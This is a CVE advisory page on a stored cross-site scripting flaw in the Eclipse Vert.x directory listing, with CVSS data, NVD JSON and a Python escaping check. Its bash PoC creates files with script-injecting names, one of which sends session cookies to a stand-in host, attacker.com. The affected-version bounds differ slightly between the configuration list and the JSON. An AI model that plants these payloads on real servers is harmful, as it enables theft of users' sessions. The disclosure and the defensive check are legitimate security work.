Security Vulnerability Report
CVE-2025-11966 CVSS 6.4 MEDIUM

Published: 2025-10-22 15:15:32
Last Modified: 2026-01-20 19:31:36

Description

In Eclipse Vert.x versions [4.0.0, 4.5.21] and [5.0.0, 5.0.4], when "directory listing" is enabled, file and directory names are inserted into generated HTML without proper escaping in the href, title, and link attributes. An attacker who can create or rename files or directories within a served path can craft filenames containing malicious script or HTML content, leading to stored cross-site scripting (XSS) that executes in the context of users viewing the affected directory listing.
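As an added defender-side illustration (not code from this report or from Vert.x), the Python below renders one listing entry the unescaped way the advisory describes and the hardened way (percent-encoded href, HTML-escaped title and text), then parses each fragment the way a browser would to confirm the filename cannot break out of its attribute. The filenames are constructed test strings and the function names are hypothetical.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote, unquote

# Constructed sample entries (test data, not real files). The last two have the
# attribute-breakout shapes the advisory describes for the href/title attributes.
SAMPLE_ENTRIES = [
    "report.pdf",
    'test" onmouseover="alert(1)',
    'evil"><img src=x onerror=alert(1)>.txt',
]


def render_unescaped(name: str) -> str:
    """Vulnerable pattern: the raw filename is interpolated into attributes and text."""
    return f'<a href="{name}" title="{name}">{name}</a>'


def render_escaped(name: str) -> str:
    """Hardened pattern: percent-encode the href path segment, HTML-escape the rest."""
    href = quote(name, safe="")            # " < > space / = ( ) become %XX
    text = html.escape(name, quote=True)   # & < > " ' become entities
    return f'<a href="{href}" title="{text}">{text}</a>'


class _Audit(HTMLParser):
    """Collects every start tag and its attributes as a browser-side parser would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_fragment(fragment: str):
    p = _Audit()
    p.feed(fragment)
    p.close()
    return p.tags


def listing_entry_is_safe(fragment: str, name: str) -> bool:
    """Safe when the fragment parses to exactly one <a> whose only attributes are
    href and title, and both decode back to the original filename."""
    tags = parse_fragment(fragment)
    if len(tags) != 1 or tags[0][0] != "a":
        return False  # injected <img>/<script>-style tags show up here
    attrs = tags[0][1]
    if set(attrs) != {"href", "title"}:
        return False  # injected event-handler attributes show up here
    return unquote(attrs["href"]) == name and attrs["title"] == name
```

Running `listing_entry_is_safe(render_unescaped(n), n)` over the samples flags both crafted names, while `render_escaped` passes for all of them.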

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:eclipse:vert.x:*:*:*:*:*:*:*:* - VULNERABLE: Eclipse Vert.x >= 4.0.0, < 4.5.21
cpe:2.3:a:eclipse:vert.x:*:*:*:*:*:*:*:* - VULNERABLE: Eclipse Vert.x >= 5.0.0, < 5.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
# CVE-2025-11966 - Eclipse Vert.x Directory Listing Stored XSS PoC
# This PoC demonstrates how to exploit the stored XSS vulnerability
# in Vert.x's directory listing feature by creating a file/directory
# with a malicious name containing HTML/JavaScript injection.

# Step 1: Create a file or directory with XSS payload in its name
# The payload targets the href and title attributes of the <a> tag
# generated by Vert.x's StaticHandler directory listing.
# Example malicious filename (for Linux/macOS):
# Using " onmouseover attribute injection in the title attribute
mkdir 'test" onmouseover="alert(document.cookie)' 2>/dev/null

# Or create a file with payload targeting href attribute:
touch 'evil"><img src=x onerror=alert(1)>.txt'

# Step 2: Access the directory listing page
# When a victim navigates to the directory listing URL, the payload
# executes in their browser context.
#
# Example URL: http://target-server/path/to/directory/

# Step 3: More sophisticated payload for cookie stealing:
# Create directory name that exfiltrates session cookies
# Note: Adjust the attacker-controlled server URL
PAYLOAD='test" onmouseover="fetch("http://attacker.com/steal?c="+document.cookie)'
mkdir "$PAYLOAD"

# Step 4: Cleanup
# rm -rf "$PAYLOAD"
# rm -f 'evil"><img src=x onerror=alert(1)>.txt'

References

https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/303 (Issue Tracking, Vendor Advisory, Exploit)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11966", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:31.730", "lastModified": "2026-01-20T19:31:35.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eclipse Vert.x versions [4.0.0, 4.5.21] and [5.0.0, 5.0.4], when \"directory listing\" is enabled, file and directory names are inserted into generated HTML without proper escaping in the href, title, and link attributes. An attacker who can create or rename files or directories within a served path can craft filenames containing malicious script or HTML content, leading to stored cross-site scripting (XSS) that executes in the context of users viewing the affected directory listing."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:vert.x:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.5.22", "matchCriteriaId": "78323EAC-F580-4CFC-AC88-A36A6D466875"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:vert.x:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.5", "matchCriteriaId": "1BA9AC40-ED8B-4031-A4EF-BC798A732173"}]}]}], "references": [{"url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/303", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory", "Exploit"]}]}}